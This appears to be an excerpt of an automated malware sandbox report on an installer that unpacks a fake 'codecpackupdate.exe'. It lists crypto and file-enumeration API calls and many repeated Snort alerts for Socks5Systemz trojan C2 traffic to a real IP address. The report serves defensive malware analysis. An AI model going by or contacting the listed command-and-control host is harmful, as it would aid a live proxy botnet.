        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045B560 ArcFourCrypt,1_2_0045B560
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045B578 ArcFourCrypt,1_2_0045B578
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeUnpacked PE file: 2.2.codecpackupdate.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exeUnpacked PE file: 3.2.codecpackupdate.exe.400000.0.unpack
        Source: 0RWRPBSuDx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047A44C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A44C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0047077C FindFirstFileA,FindNextFileA,FindClose,1_2_0047077C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004513E4 FindFirstFileA,GetLastError,1_2_004513E4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_004601DC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004601DC
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00478334 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00478334
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00460658 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460658
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_0045EC50 FindFirstFileA,FindNextFileA,FindClose,1_2_0045EC50
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpCode function: 1_2_00491EBC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00491EBC
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49736 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49736 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49740 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49740 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49741 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49741 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49742 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49742 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49743 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49743 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49744 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49744 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49745 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49745 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49746 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49746 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49748 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49748 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49749 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49749 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49750 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49750 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49751 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49751 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49752 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49752 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49753 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49753 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49754 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49754 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49755 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49755 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49756 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49756 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49757 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49757 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49758 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49758 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49759 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49759 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49760 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49760 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49761 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49761 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49762 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49762 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49763 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49763 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49764 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49764 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49765 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49765 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49766 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49766 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49767 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49767 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49768 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49768 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49769 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49769 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49770 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49770 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49771 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49771 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49772 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49772 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49773 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49773 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49774 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49774 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49775 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49775 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49776 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49776 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49777 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49777 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49778 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49778 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49779 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49779 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49780 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49780 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49781 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49781 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49782 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49782 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49783 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49783 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49784 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49784 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49785 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49785 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49786 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49786 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49787 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49787 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49788 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49788 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49789 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49789 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49790 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49790 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49791 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49791 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49792 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49792 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49793 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49793 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49794 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49794 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49795 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49795 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49796 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49796 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49797 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49797 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49798 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49798 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49799 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49799 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49800 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49800 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49801 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49801 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49802 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49802 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49803 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49803 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49804 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49804 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49805 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49805 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49806 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49806 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49807 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49807 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49808 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49808 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49809 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49809 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49810 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49810 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49811 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49811 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49812 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49812 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49813 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49813 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49814 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49814 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49815 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49815 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49816 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49816 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49817 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49817 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49818 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49818 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49819 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49819 -> 45.142.214.240:80
